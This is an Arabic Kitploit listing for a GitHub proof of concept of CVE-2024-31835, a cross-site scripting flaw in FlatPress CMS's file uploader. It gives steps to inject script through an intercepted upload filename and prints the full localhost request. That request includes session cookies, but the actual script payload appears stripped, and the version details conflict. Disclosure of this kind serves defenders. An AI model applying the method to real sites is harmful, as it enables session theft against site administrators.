Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-31835 — ثغرة برمجة نصية عبر المواقع (XSS) في نظام إدارة المحتوى Flatpress CMS الإصدار v1.3 تسمح لمهاجم عن بُعد بتنفيذ تعليمات برمجية عشوائية عبر حمولة مصممة خصيصًا في معلمة اسم الملف. | Kitploit
أدوات/GitHubGitHub/paragbagul111/cve-2024-31835
تحليل الثغرات الأمنيةتحليل الكودالاستغلالأمن الويباختبار الاختراق
GitHubparagbagul111/cve-2024-31835

CVE-2024-31835

ثغرة برمجة نصية عبر المواقع (XSS) في نظام إدارة المحتوى Flatpress CMS الإصدار v1.3 تسمح لمهاجم عن بُعد بتنفيذ تعليمات برمجية عشوائية عبر حمولة مصممة خصيصًا في معلمة اسم الملف.

عرض المستودع
5منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-31835

ثغرة برمجة نصية عبر المواقع (Cross Site Scripting) في نظام إدارة المحتوى FlatPress CMS الإصدار v1.3 تسمح لمهاجم عن بُعد بتنفيذ تعليمات برمجية عشوائية عبر حمولة مصمّمة في معلمة اسم الملف.

المكوّن المتأثر: حقل رفع الملفات في لوحة تحكم FlatPress CMS

الإصدار الثابت: Flatpress v1.3 - سيتم إصلاحه في إصدار FlatPress 1.3.

نوع الهجوم: عن بُعد

نواقل الهجوم: استغلال الثغرة عن طريق صياغة اسم ملف الصورة

خطوات إعادة الإنتاج:

  1. سجّل الدخول بحساب المدير وافتح الرابط التالي http://127.0.0.1/flatpress-1.2.1/admin.php?p=uploader&action=mediamanager
  2. انقر على حقل الرفع، ارفع أي ملف تريده، ثم اضغط على رفع واعترض الطلب باستخدام Burp Suite، سيبدو الطلب كما يلي، احقن حمولة جافاسكربت مع اسم الملف: testtest

مثال على الطلب

root@kitploit:~
POST /flatpress-1.2.1/admin.php?p=uploader&action=default HTTP/1.1
Host: 127.0.0.1
Content-Length: 1598
Cache-Control: max-age=0
sec-ch-ua: "Not A(Brand";v="24", "Chromium";v="110"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzHnyH0cX0ojRbqom
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1/flatpress-1.2.1/admin.php?p=uploader
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: fpuser_fp-9b0a379a=parag; fppass_fp-9b0a379a=%242y%2410%24j.D1Ab.xVMoIDu9yQF8QjefOZmz9JPoh4QwzpoCdYxlqSkNQDGag2; fpsess_fp-9b0a379a=mg65h4rd8onvv2tniminpq635f
Connection: close

------WebKitFormBoundaryzHnyH0cX0ojRbqom
Content-Disposition: form-data; name="_wpnonce"
60f24876be
------WebKitFormBoundaryzHnyH0cX0ojRbqom
Content-Disposition: form-data; name="_wp_http_referer"
/flatpress-1.2.1/admin.php?p=uploader
------WebKitFormBoundaryzHnyH0cX0ojRbqom
Content-Disposition: form-data; name="upload[]"; filename="test.phpuh9aeairjipc8brr"
Content-Type: application/x-php

TEst
------WebKitFormBoundaryzHnyH0cX0ojRbqom--

المراجع:

https://portswigger.net/web-security/cross-site-scripting https://drive.google.com/file/d/1OthtP87MduNTYur_p0RZv3moY8CrBcaM/view

بائع المنتج: flatpress CMS

تم التأكيد في: 11/06/2023

المكتشف: Parag Bagul

تنزيل الأداة